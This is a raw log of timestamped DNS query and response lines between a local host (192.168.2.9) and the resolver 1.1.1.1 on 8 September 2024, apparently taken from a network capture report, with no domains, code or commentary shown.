                                                                                                                                                                                                          Sep 8, 2024 10:53:17.736390114 CEST5561753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.736545086 CEST53558921.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.736555099 CEST5917853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.736871004 CEST6250253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.737441063 CEST5377453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.737634897 CEST6452153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.737837076 CEST5502853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.737884998 CEST5003753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.742180109 CEST53550361.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.744251966 CEST53541201.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.744529963 CEST53528511.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.744641066 CEST53562131.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.745158911 CEST53551511.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.746469975 CEST53575541.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.747395039 CEST53556171.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.747548103 CEST53500671.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.748337030 CEST53591781.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.748965025 CEST53550281.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.749269962 CEST53594981.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.749686956 CEST53645211.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.749696970 CEST53537741.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.749880075 CEST6074853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.750139952 CEST53561951.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.750581980 CEST6328753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.750683069 CEST6505353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.750790119 CEST6125053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.750992060 CEST53553161.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.751390934 CEST53493321.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.751463890 CEST6317853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.751657009 CEST5819053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.751682043 CEST5778253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.753161907 CEST53600241.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.753660917 CEST5905853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.756278992 CEST53500371.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.759802103 CEST5476553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.761203051 CEST53612501.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.762041092 CEST53631781.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.764065981 CEST53607481.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.764893055 CEST53590581.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.766145945 CEST53606171.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.766752005 CEST53650531.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.766762018 CEST53550061.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.768759012 CEST6515953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.769126892 CEST53577821.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.770626068 CEST53625021.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.770637035 CEST53547651.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.777905941 CEST53651591.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.781322002 CEST53632871.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.819598913 CEST53567271.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.836558104 CEST53641311.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.836574078 CEST53642501.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.838021040 CEST53629241.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.846961975 CEST53493471.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.908814907 CEST53581901.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:18.206558943 CEST53522611.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.787924051 CEST5046153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.794678926 CEST5080553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.797039032 CEST6483453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.797697067 CEST6042353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.798551083 CEST5566553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.798742056 CEST53504611.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.800458908 CEST6158853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.801225901 CEST6423553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.802054882 CEST5993453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.802630901 CEST5408453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.802911997 CEST5300453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.803724051 CEST5703853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.804008007 CEST5305253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.804455042 CEST5958353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.805100918 CEST5398553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.805221081 CEST5083353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.805973053 CEST53508051.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.806176901 CEST5574253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.807384014 CEST5980353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.808294058 CEST5612453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.808355093 CEST53556651.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.809765100 CEST5293353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.810914040 CEST53615881.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.811239004 CEST5865953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.811798096 CEST53642351.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.812201023 CEST53530041.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.813069105 CEST53648341.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.813843966 CEST6004653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.814203024 CEST53604231.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.814682007 CEST53539851.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.815109968 CEST53595831.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.815952063 CEST53557421.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.817291975 CEST53598031.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.819701910 CEST53530521.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.819772959 CEST53529331.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.821209908 CEST53586591.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.823566914 CEST53600461.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.824549913 CEST53508331.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.827827930 CEST5281853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.834837914 CEST53570381.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.836149931 CEST53540841.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.845956087 CEST53528181.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.854739904 CEST6496953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.855695009 CEST5235953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.860083103 CEST5407353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.862905979 CEST5950853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.863775015 CEST5598753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.867000103 CEST5293953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.867032051 CEST5335153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.867996931 CEST4947353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.869319916 CEST5434553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.870887995 CEST5947853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.872430086 CEST5136153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.872864962 CEST5719253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.873892069 CEST53649691.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.873963118 CEST6199053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.874069929 CEST53540731.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.874169111 CEST6423553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.874320030 CEST53595081.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.876876116 CEST5977353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.878340960 CEST53523591.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.878485918 CEST53543451.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.878531933 CEST53533511.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.878956079 CEST53529391.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.881500959 CEST53513611.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.883085966 CEST6046853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.883358002 CEST6209253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.883744001 CEST5083453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.883980036 CEST5501353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.884280920 CEST5431853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.884511948 CEST5643653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.884680033 CEST6443253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.884833097 CEST6126253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.886004925 CEST4925753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.886123896 CEST53494731.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.886892080 CEST53597731.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.888158083 CEST6210753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.890038013 CEST5964553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.890655041 CEST5638853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.892146111 CEST5616953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.892168045 CEST53604681.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.892281055 CEST6292053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.892646074 CEST53642351.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.893173933 CEST53550131.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.893829107 CEST53508341.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.893838882 CEST53612621.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.895174980 CEST53492571.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.897717953 CEST53559871.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.899333954 CEST53596451.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.899794102 CEST5489553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.900027990 CEST5801953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.900209904 CEST5866353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.900516987 CEST6234653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.901374102 CEST53561691.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.901576996 CEST6016753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.901869059 CEST53594781.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.903103113 CEST53621071.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.904438972 CEST53571921.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.906286955 CEST53629201.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.906296968 CEST53563881.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.909174919 CEST5195653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.909461975 CEST53580191.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.909813881 CEST53548951.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.910049915 CEST53586631.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.911403894 CEST53601671.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.914758921 CEST5234753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.918447018 CEST4940253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.918463945 CEST5924053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.919258118 CEST53623461.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.919583082 CEST5181553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.920553923 CEST6335753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.921236992 CEST5735753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.925055027 CEST5218553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.927961111 CEST53519561.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.928535938 CEST53494021.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.934484959 CEST53521851.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.934695959 CEST53592401.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.935410976 CEST53518151.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.947695971 CEST53523471.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.950757027 CEST53633571.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.953382015 CEST53573571.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.983558893 CEST53599341.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.044464111 CEST53619901.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.081435919 CEST53543181.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.245532036 CEST53644321.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.806060076 CEST5612453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.868444920 CEST6209253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.875046968 CEST53620921.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.884517908 CEST5643653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:29.805625916 CEST5612453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:29.861633062 CEST53561241.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:29.861648083 CEST53561241.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:29.861656904 CEST53561241.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:29.899425030 CEST5643653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:30.616245985 CEST53620921.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:31.494752884 CEST5782153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:31.915034056 CEST5643653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:32.510521889 CEST5782153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:33.481517076 CEST5198553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:33.508725882 CEST5782153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:33.737365961 CEST53578211.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:33.737382889 CEST53578211.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:33.737391949 CEST53578211.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:34.095918894 CEST53564361.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:34.095937014 CEST53564361.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:34.095946074 CEST53564361.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:34.095952034 CEST53564361.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:34.477509975 CEST5198553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:34.870033979 CEST53519851.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:34.870058060 CEST53519851.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:35.036362886 CEST6196553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:36.039982080 CEST6196553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:37.055639029 CEST6196553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:37.294894934 CEST53619651.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:37.294981956 CEST53619651.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:37.294992924 CEST53619651.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.113651037 CEST5273353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.114234924 CEST5858053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.115925074 CEST5947453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.116677046 CEST6515353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.118935108 CEST6054753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.119184017 CEST5737053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.122683048 CEST53527331.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.123718023 CEST53585801.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.125843048 CEST53594741.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.126777887 CEST53651531.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.128262043 CEST53573701.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.135792971 CEST53605471.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.136405945 CEST5517753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.138392925 CEST5460153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.138581038 CEST5185353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.139226913 CEST5826853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.139244080 CEST4983553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.139800072 CEST5116953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.140284061 CEST5953553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.145951986 CEST53551771.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.147556067 CEST53518531.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.149491072 CEST53511691.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.149996996 CEST53595351.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.150046110 CEST53582681.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.153877974 CEST53546011.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.156384945 CEST5184053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.163805008 CEST5711953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.164083004 CEST6490253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.165591955 CEST5021853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.166536093 CEST6310753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.167038918 CEST5685653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.167217970 CEST6476653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.168637037 CEST6300453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.168809891 CEST5177853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.169240952 CEST53498351.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.169862986 CEST5799053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.170093060 CEST5716053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.170330048 CEST5651253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.170488119 CEST5442553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.172739029 CEST53518401.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.172931910 CEST5292053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.173250914 CEST5561953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.174129009 CEST5609953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.174253941 CEST53571191.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.174700022 CEST6498353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.176160097 CEST53631071.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.176898003 CEST5349253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.177109957 CEST6256053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.177283049 CEST6052553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.177474976 CEST5341053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.177789927 CEST53568561.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.178239107 CEST5062853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.178271055 CEST5345853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.178515911 CEST5617753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.179352045 CEST53517781.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.179538965 CEST53579901.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.180217028 CEST53571601.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.181261063 CEST53544251.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.181571960 CEST53502181.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.181864023 CEST5503353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.182040930 CEST6107653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.183033943 CEST5909853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.183281898 CEST5619253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.183458090 CEST6323953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.183727026 CEST53529201.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.185520887 CEST6303253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.188530922 CEST53649831.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.188543081 CEST53565121.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.188550949 CEST53605251.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.188988924 CEST53556191.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.189580917 CEST53561771.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.190174103 CEST53506281.1.1.1192.168.2.9
